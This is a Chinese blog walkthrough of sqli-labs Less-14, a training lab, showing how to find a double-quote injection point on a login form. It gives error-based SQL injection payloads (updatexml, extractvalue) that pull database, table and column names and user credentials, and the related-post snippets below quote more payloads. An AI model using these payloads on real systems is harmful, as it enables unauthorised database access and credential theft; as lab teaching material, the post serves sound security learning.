sqli-labs靶场第十四关

于 2024-05-11 11:41:13 发布
阅读量350 收藏 10
点赞数 3
文章标签: 数据库 mybatis
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64302290/article/details/138680778
版权

目录

1:分析

找闭合符:

2:开始注入

报错注入:

注入数据库名:

注入表名:

注入列名:

注入具体值:

1:分析

        经过我们的实验发现当我们输入的密码后面存在双引号时会报错,由此可以发现注入点在此处。

找闭合符:

当我们输入正确的账号并在后面加上#后,可以成功登录,由此我们可以使用#进行闭合。

2:开始注入

        因为当我们输入的sql语句出错时web界面会将错误爆出来,所以我们可以使用报错注入的方式进行注入。

        在账号输入栏进行注入。

           

报错注入:

注入数据库名:

admin" and updatexml(1,concat(0x7e,(select database()),0x7e),1)#

注入表名:

admin" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#

注入列名:

通过观察可以知道最有可能存放敏感信息的表为users表,所以我们将users表的信息注入出来。

admin " and  updatexml(1,concat(0x7e,(select  group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' ),0x7e),1) #

注入具体值:

        我们已经注入出来了列名,现在我们将username和password注入出来。

admin" and updatexml(1,substr(concat(0x7e,(select group_concat(username) from users),0x7e),1,32),1)#

到此我们就成功的注入了,想要注入其他的值只需要重复上面的操作即可。

             

@菜鸟小小
关注
  • 3
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs14(基于post提交的双引号闭合的报错注入)通思路
zyh1588的博客
11-11 691
小白回顾sql靶场14
sqli-labs第十四
yuqnqi的博客
05-09 246
由于extractvalue()函数能够查询的字符串长度最大是32个字符,所以需要用substr()函数进行字符串截取,分段把表中的数据拿到。上面从1开始,截取30个字段。于是这次就从31开始,同样是截取30个字符。分段把users表中用户名和密码数据拿到。所以字段数为2,且页面无回显。还是用burp吧,看着方便。
Sqlilabs-14
KAKA的博客
07-07 491
这里来到了第 14 ,题目是个忽悠,说是单引号+括号,整的跟 13 一样但其实就是个大忽悠 在 Hackbar 上做注入,这一 hackbar 又可以用了…这是属于哪波操作? uname=admin'&passwd=111&submit=submit 回显正常[这时你就知道题目忽悠人了] uname=admin"&passwd=111&submit=submit 回显报错[说明是双引号的人,没错了] uname=admin"#&passwd=111
Sqli-labs靶场14详解[Sqli-labs-less-14]
m0_73615178的博客
03-02 396
所以,payload分析输入一个username值然后使用双引号 " 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。当值为3时报错显示,所以列数为2,但是没有显示位,所以尝试报错注入。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。根据返回值发现,如果登录成功将显示一个成功的图片。
sqli-labs-14
qq_53030229的博客
05-11 317
文章目录前言一、抓包、判断注入点二、判断回显字段三、获取数据库四、获取数据表五、获取字段六、获取用户名、密码 前言 摸鱼.......... 一、抓包、判断注入点 二、判断回显字段 其实这里只有两个回显字段的,我这里使用3只是为了让你们方便看 passwd=12123"order by 2--+ 三、获取数据库 uname=admin&passwd=12123"and exp(~(select * from (select database() ) a) )--+ 四、获取数据表 un
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2 3 4 5 4 7 8 9 11 12 13 14 15 16 17 18 19 20 21 22 23 24 的练习内容,可以供给初学sql注入的学者参考
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs靶场
最新发布
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
SQLi LABS Less 14 报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-21 1万+
SQLi 第十四SQLi-LABS Less-14SQLi-LABS Less 14SQLiLABS Less14SQLi Less 14
sqli-labs/Less-14
m0_71299382的博客
11-18 168
sqli-labs第十四
sqli-labs (less11-less14)
Xi4or0uji
07-29 1501
less 11 post方法单引号绕过报错注入 这跟之前get方法的差不了多少,只是get方法换成了post方法 post数据uname=1' union select 1,group_concat(schema_name) from information_schema.schemata#&passwd=1可以得到 uname=1' union select 1,group...
sqli-labs(14
jimggg的博客
03-20 256
Less-14 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入) 在password输入"会报错 "#就不报错了 那么应该是“”的闭合 但是没有回显的值 只有报错的信息,只能盲注 方法一,报错型 uname=admin" and extractvalue(1,concat(0x7e,(select data...
详细sqli-labs(1-65)通讲解
m0_67401134的博客
07-30 1万+
如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65重点卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。...
sqli-labs ————less -18
Fly_鹏程万里
05-12 3763
Less-18源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&gt..
sqli-labs第十三--十五
小人物的博客
06-18 3259
第十三 Double Injection- String- with twist(双注入 - 字符型 - 变形) 看一看它的源代码 POST传值没有任何过滤,@不显示输出,echo $sql;这个语句是我加的,为了显示再输入框中的语句是如何显示的 直接闭合,用户名和密码输入“ ‘) or (‘1’) = (‘1%23 ” 双引号里面的语句,前面的单引号加括号和sql中的括号单引号闭合,...
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2到24SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值